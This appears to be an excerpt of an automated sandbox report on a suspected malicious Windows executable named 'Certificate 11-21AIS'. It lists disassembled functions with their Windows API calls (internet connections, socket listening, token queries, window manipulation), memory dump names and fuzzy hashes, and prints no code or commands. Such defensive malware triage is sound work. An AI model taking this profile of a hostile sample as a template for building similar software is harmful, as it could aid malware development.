                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                              • String ID:
                                                                              • API String ID: 2864067406-0
                                                                              • Opcode ID: 8324007498f5febec300b3b2e9e67d9ea0586beca39e65404b237f439143b288
                                                                              • Instruction ID: d594dce20cb3ee0dc6ccb62f1b7e0b14635fd280632c54372ab2f0f63047da45
                                                                              • Opcode Fuzzy Hash: 8324007498f5febec300b3b2e9e67d9ea0586beca39e65404b237f439143b288
                                                                              • Instruction Fuzzy Hash: 2C219E3D601028EFDB258F94E868EEA7BB9EB0A310F144179F915872A9D7309951EB50
                                                                              Function 0091431C Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00914358
                                                                                • Part of subcall function 009143E2: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00914401
                                                                                • Part of subcall function 009143E2: InternetCloseHandle.WININET(00000000), ref: 0091449E
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Internet$CloseConnectHandleOpen
                                                                              • String ID:
                                                                              • API String ID: 1463438336-0
                                                                              • Opcode ID: a8c892b1242237c74f52bc88e85023838e530108b7dfc8e5fb24834dd23278c4
                                                                              • Instruction ID: afb392659b30cd4e85cbb46baa140015746820900e49eb0b8ec6aad69e620457
                                                                              • Opcode Fuzzy Hash: a8c892b1242237c74f52bc88e85023838e530108b7dfc8e5fb24834dd23278c4
                                                                              • Instruction Fuzzy Hash: A721D175305609BFEB119F60DD00FFBB7ADFF8C710F00401ABA2596650DB7198A2AB90
                                                                              Function 00928A37 Relevance: 6.1, APIs: 4, Instructions: 69COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowLongW.USER32(?,000000EC), ref: 00928AA6
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00928AC0
                                                                              • SetWindowLongW.USER32(?,000000EC,00000000), ref: 00928ACE
                                                                              • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00928ADC
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Long$AttributesLayered
                                                                              • String ID:
                                                                              • API String ID: 2169480361-0
                                                                              • Opcode ID: 6bba4c315d21c7549c8c3db47255aef11fda56660c37ff6380ccd2788dd1f2d0
                                                                              • Instruction ID: b209f3225f220835e4053fbb334d524058c3b6aba245d86c4e820d1e04093c3a
                                                                              • Opcode Fuzzy Hash: 6bba4c315d21c7549c8c3db47255aef11fda56660c37ff6380ccd2788dd1f2d0
                                                                              • Instruction Fuzzy Hash: 8B117C35256521AFDB04AB18DC05FAA77A9FF86320F14451AF916C72E1CF74AC018B95
                                                                              Function 00918A7F Relevance: 6.1, APIs: 4, Instructions: 69networkCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • select.WSOCK32(00000000,00000001,00000000,00000000,?), ref: 00918AE0
                                                                              • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00918AF2
                                                                              • accept.WSOCK32(00000000,00000000,00000000), ref: 00918AFF
                                                                              • WSAGetLastError.WSOCK32(00000000), ref: 00918B16
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLastacceptselect
                                                                              • String ID:
                                                                              • API String ID: 385091864-0
                                                                              • Opcode ID: d92872b74d1f9d1d8ae352f4f9a467e6df91c41e8f1139544ed6e8d434ed0ecc
                                                                              • Instruction ID: 9bf63ef461a0050af046dd3778cfeb63713ebb733c4882c61550de167ad37e15
                                                                              • Opcode Fuzzy Hash: d92872b74d1f9d1d8ae352f4f9a467e6df91c41e8f1139544ed6e8d434ed0ecc
                                                                              • Instruction Fuzzy Hash: 08218176A011249FC7119F69D885E9EBBECEF4A310F00816AF849D7290DB749A818B90
                                                                              Function 00900AA6 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 68stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00901E68: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00900ABB,?,?,?,0090187A,00000000,000000EF,00000119,?,?), ref: 00901E77
                                                                                • Part of subcall function 00901E68: lstrcpyW.KERNEL32(00000000,?,?,00900ABB,?,?,?,0090187A,00000000,000000EF,00000119,?,?,00000000), ref: 00901E9D
                                                                                • Part of subcall function 00901E68: lstrcmpiW.KERNEL32(00000000,?,00900ABB,?,?,?,0090187A,00000000,000000EF,00000119,?,?), ref: 00901ECE
                                                                              • lstrlenW.KERNEL32(?,00000002,?,?,?,?,0090187A,00000000,000000EF,00000119,?,?,00000000), ref: 00900AD4
                                                                              • lstrcpyW.KERNEL32(00000000,?,?,0090187A,00000000,000000EF,00000119,?,?,00000000), ref: 00900AFA
                                                                              • lstrcmpiW.KERNEL32(00000002,cdecl,?,0090187A,00000000,000000EF,00000119,?,?,00000000), ref: 00900B2E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: lstrcmpilstrcpylstrlen
                                                                              • String ID: cdecl
                                                                              • API String ID: 4031866154-3896280584
                                                                              • Opcode ID: 4caecb60c11dd0852beeb9d971299ec7514eddd81f681e99ff3b880876db2537
                                                                              • Instruction ID: 7b787db595d8b0f2b2c6908ee44338175592681e48529a57376e4ec19c651bf3
                                                                              • Opcode Fuzzy Hash: 4caecb60c11dd0852beeb9d971299ec7514eddd81f681e99ff3b880876db2537
                                                                              • Instruction Fuzzy Hash: 4611933A210305AFDB25AF24DC45E7A77A9FF89354F80416AE906CB290EB719850D7A1
                                                                              Function 008F2F96 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _free.LIBCMT ref: 008F2FB5
                                                                                • Part of subcall function 008E395C: __FF_MSGBANNER.LIBCMT ref: 008E3973
                                                                                • Part of subcall function 008E395C: __NMSG_WRITE.LIBCMT ref: 008E397A
                                                                                • Part of subcall function 008E395C: RtlAllocateHeap.NTDLL(00FA0000,00000000,00000001,00000001,00000000,?,?,008DF507,?,0000000E), ref: 008E399F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AllocateHeap_free
                                                                              • String ID:
                                                                              • API String ID: 614378929-0
                                                                              • Opcode ID: 1d8e892360682ab42b426f08cc913e7a61b0efd6cd51684f0d45a024fa406082
                                                                              • Instruction ID: 242bf88dae24911d6f860ac81f8e1d215967566ee30e44c9f7badf7b6c9855b7
                                                                              • Opcode Fuzzy Hash: 1d8e892360682ab42b426f08cc913e7a61b0efd6cd51684f0d45a024fa406082
                                                                              • Instruction Fuzzy Hash: C411063251D65AABCB313F79AC0467A3B98FF42364F304526FA09DA291DF30CD409B92
                                                                              Function 008DEB83 Relevance: 6.1, APIs: 4, Instructions: 65timewindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 008DEBB2
                                                                                • Part of subcall function 008C51AF: _memset.LIBCMT ref: 008C522F
                                                                                • Part of subcall function 008C51AF: _wcscpy.LIBCMT ref: 008C5283
                                                                                • Part of subcall function 008C51AF: Shell_NotifyIconW.SHELL32(00000001,?), ref: 008C5293
                                                                              • KillTimer.USER32(?,00000001,?,?), ref: 008DEC07
                                                                              • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 008DEC16
                                                                              • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00933C88
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                              • String ID:
                                                                              • API String ID: 1378193009-0
                                                                              • Opcode ID: b001a68c99578c91e6c004b7e0dc3a6bd6e5fdbbbe8a2df57004153ad709168c
                                                                              • Instruction ID: 058acb4b3b7feeb999be09631109fb5ab4a5629b93f2f25232196cf1e7441d52
                                                                              • Opcode Fuzzy Hash: b001a68c99578c91e6c004b7e0dc3a6bd6e5fdbbbe8a2df57004153ad709168c
                                                                              • Instruction Fuzzy Hash: E921DA745587849FE7339B28CC55FE7BBECEB01308F04444EE6CA9A241C3742A84CB51
                                                                              Function 0090058F Relevance: 6.1, APIs: 4, Instructions: 64registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 009005AC
                                                                              • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 009005C7
                                                                              • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 009005DD
                                                                              • FreeLibrary.KERNEL32(?), ref: 00900632
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Type$FileFreeLibraryLoadModuleNameRegister
                                                                              • String ID:
                                                                              • API String ID: 3137044355-0
                                                                              • Opcode ID: 138b76b15082e900106a4f54398d30cceb18c4ca814cc4b5373ca35ef107177a
                                                                              • Instruction ID: 106f3f1a44b552e53baf3904acbce7ac14433abf22802721b902ffb340a2bc7e
                                                                              • Opcode Fuzzy Hash: 138b76b15082e900106a4f54398d30cceb18c4ca814cc4b5373ca35ef107177a
                                                                              • Instruction Fuzzy Hash: 7221AC75940208EFDB208F91DC88BEABBBDEFC0704F008A69E51A92190DB75EA54DF51
                                                                              Function 00906713 Relevance: 6.1, APIs: 4, Instructions: 64fileCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00906733
                                                                              • _memset.LIBCMT ref: 00906754
                                                                              • DeviceIoControl.KERNEL32(00000000,0004D02C,?,00000200,?,00000200,?,00000000), ref: 009067A6
                                                                              • CloseHandle.KERNEL32(00000000), ref: 009067AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseControlCreateDeviceFileHandle_memset
                                                                              • String ID:
                                                                              • API String ID: 1157408455-0
                                                                              • Opcode ID: ba1fab86cfb439fe06a2232119cbcc64af1bee9f46db0fa96574ab994ce8d59e
                                                                              • Instruction ID: c94dcf6a1b8560f08cecf2f207b578870d36ff800755b7475cd41404c5970ff1
                                                                              • Opcode Fuzzy Hash: ba1fab86cfb439fe06a2232119cbcc64af1bee9f46db0fa96574ab994ce8d59e
                                                                              • Instruction Fuzzy Hash: 7E110A769022287AE7205BA5AC4DFAFBABCEF45B24F10419AF504E71C0D3744E808BA4
                                                                              Function 008FB1CC Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008FAA62: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008FAA79
                                                                                • Part of subcall function 008FAA62: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008FAA83
                                                                                • Part of subcall function 008FAA62: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008FAA92
                                                                                • Part of subcall function 008FAA62: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008FAA99
                                                                                • Part of subcall function 008FAA62: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008FAAAF
                                                                              • GetLengthSid.ADVAPI32(?,00000000,008FADE4,?,?), ref: 008FB21B
                                                                              • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008FB227
                                                                              • HeapAlloc.KERNEL32(00000000), ref: 008FB22E
                                                                              • CopySid.ADVAPI32(?,00000000,?), ref: 008FB247
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Heap$AllocInformationProcessToken$CopyErrorLastLength
                                                                              • String ID:
                                                                              • API String ID: 4217664535-0
                                                                              • Opcode ID: 35819177096d810c0aff2e4fe694229de27bf5dab53dd5bcd5ca60fb1825e4a3
                                                                              • Instruction ID: 12873bf31f5048e5db1daa4202ff08107197e61e672d85cb6ed866a6dc9c8e68
                                                                              • Opcode Fuzzy Hash: 35819177096d810c0aff2e4fe694229de27bf5dab53dd5bcd5ca60fb1825e4a3
                                                                              • Instruction Fuzzy Hash: E5119175A11209EFDB189FA8DC95EBEB7A9FF85314F14802DEA42D7210D731AE44DB10
                                                                              Function 008FB478 Relevance: 6.1, APIs: 4, Instructions: 58windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000B0,?,?), ref: 008FB498
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008FB4AA
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008FB4C0
                                                                              • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008FB4DB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 23c3d4c09fc32572d2f9b18ef02b1c89138a2426ba067b5fb645bac0e6819d9f
                                                                              • Instruction ID: 66bb5a65886dcba6d5d765e280eed271b403160fc3d3b1e080154c7b7826a085
                                                                              • Opcode Fuzzy Hash: 23c3d4c09fc32572d2f9b18ef02b1c89138a2426ba067b5fb645bac0e6819d9f
                                                                              • Instruction Fuzzy Hash: E9112A7A900218FFDB11DFA9C985EADBBB4FB08710F204091E604F7295D771AE51DB94
                                                                              Function 008DB55D Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008DB34E: GetWindowLongW.USER32(?,000000EB), ref: 008DB35F
                                                                              • DefDlgProcW.USER32(?,00000020,?,00000000), ref: 008DB5A5
                                                                              • GetClientRect.USER32(?,?), ref: 0093E69A
                                                                              • GetCursorPos.USER32(?), ref: 0093E6A4
                                                                              • ScreenToClient.USER32(?,?), ref: 0093E6AF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Client$CursorLongProcRectScreenWindow
                                                                              • String ID:
                                                                              • API String ID: 4127811313-0
                                                                              • Opcode ID: cae48e00225c12d65c10accee574651eb2b98bba57b988d57f69080b2898ea2b
                                                                              • Instruction ID: 6605f9d078ccdd674517083008c83bb7198609bc7fc05467820a6db65653429c
                                                                              • Opcode Fuzzy Hash: cae48e00225c12d65c10accee574651eb2b98bba57b988d57f69080b2898ea2b
                                                                              • Instruction Fuzzy Hash: 31113635901029FFCF14DF98E846DAE77B9FB09308F010552F941E7240D730AA92DBA1
                                                                              Function 0090732B Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 00907352
                                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00907385
                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0090739B
                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 009073A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                              • String ID:
                                                                              • API String ID: 2880819207-0
                                                                              • Opcode ID: 10f72fd40709c12833a4b9b9fd68471ee0599878520ef4a6b56957b82a1a3aeb
                                                                              • Instruction ID: 460525237c67dc1dc19d0b6ba8d9995d70561ff77cabccb628903d4440cabea1
                                                                              • Opcode Fuzzy Hash: 10f72fd40709c12833a4b9b9fd68471ee0599878520ef4a6b56957b82a1a3aeb
                                                                              • Instruction Fuzzy Hash: 1B110876A18204BFD7119FACDC05E9EBBADAB45324F044355FD31D3391D6709D00A7A1
                                                                              Function 008DD17C Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 008DD1BA
                                                                              • GetStockObject.GDI32(00000011), ref: 008DD1CE
                                                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 008DD1D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateMessageObjectSendStockWindow
                                                                              • String ID:
                                                                              • API String ID: 3970641297-0
                                                                              • Opcode ID: 28df766757c2f57f05bce80dfcbf8dc768d6d4ea422584a8a2ee46b7abc2a7a6
                                                                              • Instruction ID: 96dbb54dfba0b0bd8f150b67eb42b49233b3ef9d4beb7cbef0d8208c23714384
                                                                              • Opcode Fuzzy Hash: 28df766757c2f57f05bce80dfcbf8dc768d6d4ea422584a8a2ee46b7abc2a7a6
                                                                              • Instruction Fuzzy Hash: 6111C0B6106609BFEF124FA0DC50EEABB6DFF09368F040202FA1592250C731DC60EBA0
                                                                              Function 008F4DF2 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                              • String ID:
                                                                              • API String ID: 3016257755-0
                                                                              • Opcode ID: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                              • Instruction ID: 3fc8e776d2725bfea57f8ebef7f8a364348824979a417838c1c169c12ecef562
                                                                              • Opcode Fuzzy Hash: 3c6a35542a271610c24967ae1addb0a5128256cd46e27c9700edfec13bdc5c5a
                                                                              • Instruction Fuzzy Hash: 4B014C7604014EBBCF125EA8DC018EE3F63FB18364B589456FF2899131D336CAB1AB81
